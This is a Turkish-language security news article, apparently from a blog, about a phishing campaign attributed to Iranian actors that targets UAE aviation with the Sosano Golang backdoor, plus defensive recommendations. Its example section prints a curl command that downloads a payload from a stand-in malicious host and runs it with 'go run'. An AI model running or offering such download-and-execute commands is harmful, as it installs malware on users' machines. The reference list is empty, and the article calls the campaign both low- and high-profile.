“`html
Giriş
Son dönemde siber güvenlik alanında yapılan araştırmalar, İran merkezli hacker gruplarının Hindistan menşeli bir firmaya ait e-posta hesaplarını kullanarak Birleşik Arap Emirlikleri (BAE) havacılık sektörünü hedef alan yeni bir phishing kampanyası düzenlediğini ortaya koymuştur. Bu kampanya, düşük profilli ancak yüksek hedefli bir şekilde, “beşten az” kuruluşu tek hedef olarak belirlemiş ve bu organizasyonların siber altyapısına sızmaya çalışmıştır.
Teknik Açıklamalar
Yapılan araştırmalar, bu saldırıların özellikle havacılık ve uydu iletişimi gibi kritik altyapı sektörlerini hedef aldığına işaret etmektedir. Saldırılar, daha önce belgelenmemiş bir Golang arka kapısı olan Sosano aracılığıyla gerçekleştirilmiştir. Sosano, istenmeyen erişim sağlamak ve veri çalmak için yüksek düzeyde özelleştirilebilir bir komut ve kontrol (C2) altyapısına sahiptir.
Bu tür bir zararlı yazılım, havacılık sektörüne yönelik özel veri toplama ve izleme işlevleri sunmakta, böylece tehdit aktörlerine hedef almış oldukları kuruluşların siber durumlarını ve gizli bilgilerini elde etme imkanı tanımaktadır.
Örnekler
Özellikle bu tür bir zararlı yazılımın nasıl çalıştığını anlamak için, aşağıda teorik bir örnek kod verilmiştir. Bu kod, kişisel bir bilgisayara zararlı yazılım yüklemeye yönelik bir komut dizisi olarak düşünülmelidir:
curl -o sosano.go https://malicious.example.com/sosano.go
go run sosano.go
Önlemler & En İyi Uygulamalar
Siber güvenliği artırmak ve bu tür saldırıları engellemek için aşağıdaki önlemler önerilmektedir:
- E-posta Filtreleme: Şüpheli görünümdeki e-postaların filtrelenmesi için gelişmiş e-posta güvenlik çözümleri kullanılmalıdır.
- Çok Faktörlü Kimlik Doğrulama (MFA): Kullanıcı hesapları için MFA uygulamak, yetkisiz erişim riskini önemli ölçüde azaltır.
- Sistem Güncellemeleri: Tüm işletim sistemleri ve yazılımlar düzenli olarak güncellenmeli, bilinen güvenlik açıkları kapatılmalıdır.
- Güvenlik Eğitimleri: Çalışanlar, phishing saldırıları ve sosyal mühendislik konularında düzenli olarak eğitilmelidir.
Sonuç & Özet
İranlı hacker gruplarının, Hindistan merkezli bir firmanın e-posta hesaplarını kullanarak BAE havacılık sektörüne yönelik gerçekleştirdiği bu yüksek profilli saldırılar, siber güvenlik riskleri konusunda ciddi endişelere yol açmaktadır. Bu tür tehditlerle başa çıkmak için, gerekli önlemlerin alınması ve sürekli bir güvenlik farkındalığı sağlanması kritik önem taşımaktadır.
Kaynakça
“` [Collection]
About the Author
